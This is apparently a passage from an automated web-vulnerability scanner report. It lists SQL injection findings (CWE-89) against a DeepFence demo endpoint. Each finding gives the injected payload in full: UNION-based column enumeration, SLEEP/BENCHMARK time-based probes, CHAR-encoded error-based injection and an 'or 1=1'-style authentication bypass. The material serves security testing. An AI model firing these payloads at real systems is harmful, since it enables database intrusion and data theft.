href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #967\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #968\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #969\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+\nCHAR(107)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #970\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #971\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #972\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #973\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #974\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT @@VERSION,USER(),SLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #975\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR\n(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(\n116)+CHAR(69)+CHAR(65)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #976\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #977\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #978\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin\") or (\"1\"=\"1\"#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #979Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioHAVING 1=0#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #980\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" 